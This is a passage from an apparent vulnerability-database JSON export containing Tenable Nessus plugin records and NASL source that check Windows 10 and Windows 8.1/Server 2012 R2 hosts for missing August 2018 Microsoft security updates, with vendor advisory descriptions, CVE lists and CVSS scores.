attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8353, CVE-2018-8371, CVE-2018-8373,\n CVE-2018-8389)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8401, CVE-2018-8405,\n CVE-2018-8406)\n\n - An information disclosure vulnerability exists in\n Microsoft .NET Framework that could allow an attacker to\n access information in multi-tenant environments. The\n vulnerability is caused when .NET Framework is used in\n high-load/high-density network connections where content\n from one stream can blend into another stream.\n (CVE-2018-8360)\n\n - A spoofing vulnerability exists when Microsoft Edge\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was on a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2018-8388)", "edition": 28, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-08-14T00:00:00", "title": "KB4343885: Windows 10 Version 1703 August 2018 Security Update (Foreshadow)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8401", "CVE-2018-0952", "CVE-2018-8200", "CVE-2018-8343", "CVE-2018-8406", "CVE-2018-8345", "CVE-2018-8351", "CVE-2018-8403", "CVE-2018-8372", "CVE-2018-8388", "CVE-2018-8405", "CVE-2018-8339", "CVE-2018-8344", "CVE-2018-8355", "CVE-2018-8350", "CVE-2018-8394", "CVE-2018-3646", "CVE-2018-8316", "CVE-2018-8373", "CVE-2018-8357", "CVE-2018-8390", "CVE-2018-8266", "CVE-2018-3620", "CVE-2018-8404", "CVE-2018-8399", "CVE-2018-3615", "CVE-2018-8348", "CVE-2018-8370", "CVE-2018-8341", "CVE-2018-8204", "CVE-2018-8414", "CVE-2018-8347", "CVE-2018-8385", "CVE-2018-8381", "CVE-2018-8371", "CVE-2018-8360", "CVE-2018-8389", "CVE-2018-8398", "CVE-2018-8353", "CVE-2018-8349"], "modified": "2018-08-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS18_AUG_4343885.NASL", "href": "https://www.tenable.com/plugins/nessus/111684", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111684);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2018-3615\",\n \"CVE-2018-3620\",\n \"CVE-2018-3646\",\n \"CVE-2018-0952\",\n \"CVE-2018-8200\",\n \"CVE-2018-8204\",\n \"CVE-2018-8266\",\n \"CVE-2018-8316\",\n \"CVE-2018-8339\",\n \"CVE-2018-8341\",\n \"CVE-2018-8343\",\n \"CVE-2018-8344\",\n \"CVE-2018-8345\",\n \"CVE-2018-8347\",\n \"CVE-2018-8348\",\n \"CVE-2018-8349\",\n \"CVE-2018-8350\",\n \"CVE-2018-8351\",\n \"CVE-2018-8353\",\n \"CVE-2018-8355\",\n \"CVE-2018-8357\",\n \"CVE-2018-8360\",\n \"CVE-2018-8370\",\n \"CVE-2018-8371\",\n \"CVE-2018-8372\",\n \"CVE-2018-8373\",\n \"CVE-2018-8381\",\n \"CVE-2018-8385\",\n \"CVE-2018-8388\",\n \"CVE-2018-8389\",\n \"CVE-2018-8390\",\n \"CVE-2018-8394\",\n \"CVE-2018-8398\",\n \"CVE-2018-8399\",\n \"CVE-2018-8401\",\n \"CVE-2018-8403\",\n \"CVE-2018-8404\",\n \"CVE-2018-8405\",\n \"CVE-2018-8406\",\n \"CVE-2018-8414\"\n );\n script_bugtraq_id(\n 104977,\n 104978,\n 104980,\n 104982,\n 104983,\n 104984,\n 104985,\n 104986,\n 104987,\n 104988,\n 104992,\n 104995,\n 104998,\n 104999,\n 105001,\n 105006,\n 105007,\n 105008,\n 105011,\n 105012,\n 105016,\n 105027,\n 105030,\n 105041,\n 105048\n );\n script_xref(name:\"MSKB\", value:\"4343885\");\n script_xref(name:\"MSFT\", value:\"MS18-4343885\");\n\n script_name(english:\"KB4343885: Windows 10 Version 1703 August 2018 Security Update (Foreshadow)\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4343885.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8341, CVE-2018-8348)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8344)\n\n - An elevation of privilege vulnerability exists in the\n Network Driver Interface Specification (NDIS) when\n ndis.sys fails to check the length of a buffer prior to\n copying memory to it. (CVE-2018-8343)\n\n - A remote code execution vulnerability exists in\n &quot;Microsoft COM for Windows&quot; when it fails to\n properly handle serialized objects. An attacker who\n successfully exploited the vulnerability could use a\n specially crafted file or script to perform actions. In\n an email attack scenario, an attacker could exploit the\n vulnerability by sending the specially crafted file to\n the user and convincing the user to open the file.\n (CVE-2018-8349)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8390)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2018-8414)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8200, CVE-2018-8204)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8355, CVE-2018-8372, CVE-2018-8385)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when the Windows kernel fails to\n properly handle parsing of certain symbolic links. An\n attacker who successfully exploited this vulnerability\n could potentially access privileged registry keys and\n thereby elevate permissions. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8347)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. If the current\n user is logged on with administrative user rights, an\n attacker could take control of an affected system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2018-8350)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2018-8345)\n\n - A information disclosure vulnerability exists when\n WebAudio Library improperly handles audio requests. An\n attacker who has successfully exploited this\n vulnerability might be able to read privileged data\n across trust boundaries. In browsing scenarios, an\n attacker could convince a user to visit a malicious site\n and leverage the vulnerability to obtain privileged\n information from the browser process, such as sensitive\n data from other opened tabs. An attacker could also\n inject malicious code into advertising networks used by\n trusted sites or embed malicious code on a compromised,\n but trusted, site. The update addresses the\n vulnerability by correcting how the WebAudio Library\n handles audio requests. (CVE-2018-8370)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2018-8339)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8266, CVE-2018-8381)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly validates hyperlinks before\n loading executable libraries. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8316)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8399, CVE-2018-8404)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8394, CVE-2018-8398)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8403)\n\n - An information disclosure vulnerability exists when\n affected Microsoft browsers improperly allow cross-frame\n interaction. An attacker who successfully exploited this\n vulnerability could allow an attacker to obtain browser\n frame or window state from a different domain. For an\n attack to be successful, an attacker must persuade a\n user to open a malicious website from a secure website.\n This update addresses the vulnerability by denying\n permission to read the state of the object model, to\n which frames or windows on different domains should not\n have access. (CVE-2018-8351)\n\n - An elevation of privilege vulnerability exists in\n Microsoft browsers allowing sandbox escape. An attacker\n who successfully exploited the vulnerability could use\n the sandbox escape to elevate privileges on an affected\n system. This vulnerability by itself does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability (such as a remote\n code execution vulnerability or another elevation of\n privilege vulnerability) that is capable of leveraging\n the elevated privileges when code execution is\n attempted. (CVE-2018-8357)\n\n - An Elevation of Privilege vulnerability exists when\n Diagnostics Hub Standard Collector allows file creation\n in arbitrary locations. (CVE-2018-0952)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8353, CVE-2018-8371, CVE-2018-8373,\n CVE-2018-8389)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8401, CVE-2018-8405,\n CVE-2018-8406)\n\n - An information disclosure vulnerability exists in\n Microsoft .NET Framework that could allow an attacker to\n access information in multi-tenant environments. The\n vulnerability is caused when .NET Framework is used in\n high-load/high-density network connections where content\n from one stream can blend into another stream.\n (CVE-2018-8360)\n\n - A spoofing vulnerability exists when Microsoft Edge\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was on a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2018-8388)\");\n # https://support.microsoft.com/en-us/help/4343885/windows-10-update-kb4343885\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2be0b30b\");\n # https://support.microsoft.com/en-us/help/4072698/windows-server-speculative-execution-side-channel-vulnerabilities-prot\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8902cebb\");\n script_set_attribute(attribute:\"solution\", value:\n \"Apply Cumulative Update KB4343885 as well as refer to the KB article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8344\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", 'microsoft_windows_env_vars.nasl');\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_reg_query.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-08\";\nkbs = make_list('4343885');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\nproductname = get_kb_item_or_exit(\"SMB/ProductName\");\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"15063\",\n rollup_date:\"08_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4343885])\n )\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T06:19:57", "description": "The remote Windows host is missing security update 4343888\nor cumulative update 4343898. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8403)\n\n - An information disclosure vulnerability exists in\n Microsoft .NET Framework that could allow an attacker to\n access information in multi-tenant environments. The\n vulnerability is caused when .NET Framework is used in\n high-load/high-density network connections where content\n from one stream can blend into another stream.\n (CVE-2018-8360)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8341, CVE-2018-8348)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8344)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8404)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly validates hyperlinks before\n loading executable libraries. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8316)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8355, CVE-2018-8372, CVE-2018-8385)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8353, CVE-2018-8371, CVE-2018-8373,\n CVE-2018-8389)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2018-8345)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8405)\n\n - An elevation of privilege vulnerability exists in the\n Network Driver Interface Specification (NDIS) when\n ndis.sys fails to check the length of a buffer prior to\n copying memory to it. (CVE-2018-8343)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8394, CVE-2018-8398)\n\n - A remote code execution vulnerability exists in\n &quot;Microsoft COM for Windows&quot; when it fails to\n properly handle serialized objects. An attacker who\n successfully exploited the vulnerability could use a\n specially crafted file or script to perform actions. In\n an email attack scenario, an attacker could exploit the\n vulnerability by sending the specially crafted file to\n the user and convincing the user to open the file.\n (CVE-2018-8349)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2018-8339)\n\n - A security feature bypass vulnerability exists when\n Active Directory Federation Services (AD FS) improperly\n handles multi-factor authentication requests.\n (CVE-2018-8340)\n\n - An information disclosure vulnerability exists when\n affected Microsoft browsers improperly allow cross-frame\n interaction. An attacker who successfully exploited this\n vulnerability could allow an attacker to obtain browser\n frame or window state from a different domain. For an\n attack to be successful, an attacker must persuade a\n user to open a malicious website from a secure website.\n This update addresses the vulnerability by denying\n permission to read the state of the object model, to\n which frames or windows on different domains should not\n have access. (CVE-2018-8351)", "edition": 35, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-08-14T00:00:00", "title": "KB4343888: Windows 8.1 and Windows Server 2012 R2 August 2018 Security Update (Foreshadow)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8343", "CVE-2018-8345", "CVE-2018-8351", "CVE-2018-8403", "CVE-2018-8372", "CVE-2018-8405", "CVE-2018-8339", "CVE-2018-8344", "CVE-2018-8355", "CVE-2018-8394", "CVE-2018-3646", "CVE-2018-8316", "CVE-2018-8373", "CVE-2018-3620", "CVE-2018-8404", "CVE-2018-3615", "CVE-2018-8348", "CVE-2018-8341", "CVE-2018-8385", "CVE-2018-8371", "CVE-2018-8340", "CVE-2018-8360", "CVE-2018-8389", "CVE-2018-8398", "CVE-2018-8353", "CVE-2018-8349"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS18_AUG_4343898.NASL", "href": "https://www.tenable.com/plugins/nessus/111688", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111688);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2019/12/18\");\n\n script_cve_id(\n \"CVE-2018-3615\",\n \"CVE-2018-3620\",\n \"CVE-2018-3646\",\n \"CVE-2018-8316\",\n \"CVE-2018-8339\",\n \"CVE-2018-8340\",\n \"CVE-2018-8341\",\n \"CVE-2018-8343\",\n \"CVE-2018-8344\",\n \"CVE-2018-8345\",\n \"CVE-2018-8348\",\n \"CVE-2018-8349\",\n \"CVE-2018-8351\",\n \"CVE-2018-8353\",\n \"CVE-2018-8355\",\n \"CVE-2018-8360\",\n \"CVE-2018-8371\",\n \"CVE-2018-8372\",\n \"CVE-2018-8373\",\n \"CVE-2018-8385\",\n \"CVE-2018-8389\",\n \"CVE-2018-8394\",\n \"CVE-2018-8398\",\n \"CVE-2018-8403\",\n \"CVE-2018-8404\",\n \"CVE-2018-8405\"\n );\n script_bugtraq_id(\n 104978,\n 104982,\n 104983,\n 104984,\n 104986,\n 104987,\n 104992,\n 104995,\n 104999,\n 105001,\n 105011,\n 105027,\n 105029,\n 105030\n );\n script_xref(name:\"MSKB\", value:\"4343898\");\n script_xref(name:\"MSKB\", value:\"4343888\");\n script_xref(name:\"MSFT\", value:\"MS18-4343898\");\n script_xref(name:\"MSFT\", value:\"MS18-4343888\");\n\n script_name(english:\"KB4343888: Windows 8.1 and Windows Server 2012 R2 August 2018 Security Update (Foreshadow)\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4343888\nor cumulative update 4343898. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8403)\n\n - An information disclosure vulnerability exists in\n Microsoft .NET Framework that could allow an attacker to\n access information in multi-tenant environments. The\n vulnerability is caused when .NET Framework is used in\n high-load/high-density network connections where content\n from one stream can blend into another stream.\n (CVE-2018-8360)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8341, CVE-2018-8348)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8344)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8404)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly validates hyperlinks before\n loading executable libraries. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8316)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8355, CVE-2018-8372, CVE-2018-8385)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8353, CVE-2018-8371, CVE-2018-8373,\n CVE-2018-8389)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2018-8345)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8405)\n\n - An elevation of privilege vulnerability exists in the\n Network Driver Interface Specification (NDIS) when\n ndis.sys fails to check the length of a buffer prior to\n copying memory to it. (CVE-2018-8343)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8394, CVE-2018-8398)\n\n - A remote code execution vulnerability exists in\n &quot;Microsoft COM for Windows&quot; when it fails to\n properly handle serialized objects. An attacker who\n successfully exploited the vulnerability could use a\n specially crafted file or script to perform actions. In\n an email attack scenario, an attacker could exploit the\n vulnerability by sending the specially crafted file to\n the user and convincing the user to open the file.\n (CVE-2018-8349)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2018-8339)\n\n - A security feature bypass vulnerability exists when\n Active Directory Federation Services (AD FS) improperly\n handles multi-factor authentication requests.\n (CVE-2018-8340)\n\n - An information disclosure vulnerability exists when\n affected Microsoft browsers improperly allow cross-frame\n interaction. An attacker who successfully exploited this\n vulnerability could allow an attacker to obtain browser\n frame or window state from a different domain. For an\n attack to be successful, an attacker must persuade a\n user to open a malicious website from a secure website.\n This update addresses the vulnerability by denying\n permission to read the state of the object model, to\n which frames or windows on different domains should not\n have access. (CVE-2018-8351)\");\n # https://support.microsoft.com/en-us/help/4343898/windows-81-update-kb4343898\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?82e63681\");\n # https://support.microsoft.com/en-us/help/4343888/windows-81-update-kb4343888\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1fda3003\");\n # https://support.microsoft.com/en-us/help/4072698/windows-server-speculative-execution-side-channel-vulnerabilities-prot\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8902cebb\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4343888 or Cumulative Update KB4343898\nas well as refer to the KB article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8344\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", 